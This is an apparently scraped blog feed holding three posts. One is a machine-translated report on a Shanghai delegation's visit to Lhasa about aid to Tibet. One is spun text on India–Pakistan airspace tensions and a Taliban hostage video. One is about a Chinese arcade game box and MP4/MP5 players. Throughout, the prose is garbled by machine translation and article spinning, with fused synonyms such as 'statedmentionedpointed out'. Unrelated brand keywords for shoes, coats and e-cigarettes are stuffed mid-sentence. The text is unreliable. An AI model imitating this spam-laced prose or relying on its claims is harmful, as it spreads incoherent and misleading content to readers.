Always do their counterparts in Tibet WASHINGTON Yin Cui by the Shanghai Municipal Committee, Municipal Committee, vice mayor Yang Xiong led the delegation arrived in Lhasa, Shanghai, and Tibet Autonomous Region Party Secretary Zhang, autonomous regions and deputy party secretary, District Vice President Hao Peng held talks with the leadership of the Tibet Autonomous Region . In his speech, Zhang of Shanghai people for their selfless assistance to the Tibetan people deep friendship and gratitude. Yin Cui said that Shanghai should stand on the party and the country overall strategic level, earnestly implement the central fifth Tibet Work Forum, (the switch version 3) (on the 1st edition) discussion of national economic counterpart to support Tibet principles and policies and will be on July 20, Xi Jinping hosted the Forum on Work in Tibet counterpart support proposed aid work Yin Cui said at the forum, the Shanghai municipal government attaches great importance to study the Tibetan delegation to visit Shanghai. Shanghai, the delegation visit to Tibet, the first to congratulate the 60th anniversary of peaceful liberation of Tibet, experience the economic and social development of Tibet great achievements; the second is the sixth group of cadres Shanghai sympathy; three comrades with Tibet to explore how to implement good the central principles and policies on Tibet, to further promote Shanghai support work. Yin Cui said the Shanghai counterparts in aid work in the local party and government leadership, the Tibet plans into local planning, canada goose outlet, everything from reality, to update the concept, improve the mechanism, innovative ways, expand the field, so that economic assistance and social support combined hardware and software supporting the construction of combined training of cadres and the combination of Tibet, the recent combination of aid and long-term support, focus on enhancing self-development and promotion of Xigaze counterpart support comprehensive benefits, efforts to improve the relevance and effectiveness of aid work, aid work to ensure the integrity, continuity, stability, and pioneering. Zhang said, Shanghai has always been the strong backing of Tibet, Tibet counterparts to carry out the work, the Shanghai municipal government standing in the party and state work and great national unity height, stress politics and the overall, talk about dedication, and always the cause of Xigaze people as their own career to care, make every effort to support work, to ensure economic and social Xigaze by leaps and bounds, to ensure national security and long-term stability in Tibet, the Tibetan people living standards to ensure made a significant contribution to the continuous improvement. Shanghai has become the Tibet earlier, investment in large projects of many types, moncler outlet torino, covering a wide range of performance of the most prominent group of cadres of the provinces to become one of the typical support work. Tibetan people psyche Thanks for the great party, thanks to the great motherland. Hao Peng, briefed the meeting on Tibet economic and social development of Tibet and Shanghai work. Tibet Autonomous Region Party Committee, Secretary-General of the civil servant Tashi attended the discussion. ]]> http://www.tianshi-cn.net/archives/539/feed 0 http://www.tianshi-cn.net/archives/538 http://www.tianshi-cn.net/archives/538#comments Tue, 03 Jan 2012 13:40:53 +0000 admin He alleged violations happened more ]]> He alleged violations happened more than locations that India UGG Classic Cardy are linked towards the militant group charged with plotting the Mumbai attacks.India refused violations happened, and Pakistan leader, Asif Zardari, attempted to understate the incident. “It is really areally a technical incursion, it is notit isn an incursion as a result. It a pattern of two planes once they are flying at 40,000 ft up within the air, Nike Shox once they turn, they slightly enter Pakistani soil, “he statedmentionedpointed out.Tensions in between the 2 rivals happen to be high becausethinking about that the Mumbai attacks, and political figures have at occasionsoccasions pledged cooperation and voiced consternation at their counterparts research. He will be the might be the may be the Timberland Roll-Top Boots initialfirst US soldier to become taken cheap nike shox in Afghanistan and Taliban commanders have formerly threatened to kill him.The guy within the video describes his therapy in the hands in the Taliban as humane, althoughalthoughdespite the fact that pictures of criminals becoming mistreated in US custody of the children expensive over the screen. “I had been Nike Shox continuously treated like a human becoming with dignity. I no one deny me of my clothes and take photos of me naked, “he statedmentionedpointed out.” I no dogs woofing at me and biting me as my country has completedcompletedcarried out to Muslim criminals within the jails which i pointed out. “Taliban authorities initialfirst launched a relevant video of Bergdahl in This summer, shortly following Timberland Custom Boots he was taken, and introduced earlier this year that an additional 1 was coming. The recording concludes with Zabihullah Mujahid, a Taliban spokesperson, reviving the militants demands for any prisoner exchange.IntelCenter, a US-based terrorism monitoring group, states a preliminary analysis shows the recording seems to become authentic. I wishing that, the moment when the Indian government completes their analysis and shares the infoparticularsdata around, we l have further results in further uncoverlocateuncover if you will find you will discover you l find you will find any causes about this side in the border, we l do something against them, “added Mr. Zardari.Pm Brown pledged much more assets to assist within the analysis in to the Nike Shox Mumbai terrorist attacks, which includes new explosive device-checking technologies contributing to $ 9 UGG Bailey Button Triplet to bolster Pakistani democratic institutions and fight extremism. It writes by nike shox date 12.4.2011. Tags: Nike Shox, cheap nike shox, discount nike shox, nike shox shoes, Sources: http://www.myinstylesshoes.com; ]]> http://www.tianshi-cn.net/archives/538/feed 0 http://www.tianshi-cn.net/archives/537 http://www.tianshi-cn.net/archives/537#comments Thu, 15 Dec 2011 01:16:09 +0000 admin Who said cottage only copy, is going to be ]]> Who said cottage only copy, is going to be “integration.” This doesn , a Chinese vendor introduced combining Electric Cigarettes , now the host might be discounted abroad. This arcade game box known as the host, E Liquid . It mimics ugly the fuselage Microsoft xbox 360 elite joystick controller, although the handle really should be to imitate the Sony PS3. Although in aspect the look off integration inside the two, but in games it not at all works with Xbox360 and PS3 games. This arcade game box supports Game Boy, Neo Geo and PS1 games, PS2 games are often asked run. Naturally, the computer hardware to put together this remedy also operate arcade games. E Cigarette Liquid from mainland China get a common portable media player marketing term. Music player with extensive playing these little MPEG-1 Audio Layer 3 devices of various music files, MP4 player with MPEG-4 Part 14 format and is not directly related. To the contrary, it should be referred to as the marketplace for Apple ipods “next generation” (3 1 = 4). There are even some companies started to issue MP4 players successor MP5 player. MP4 player continues to be the bulk of the current market, and manufacturers ready to create numerous MP5 player. ]]> http://www.tianshi-cn.net/archives/537/feed 0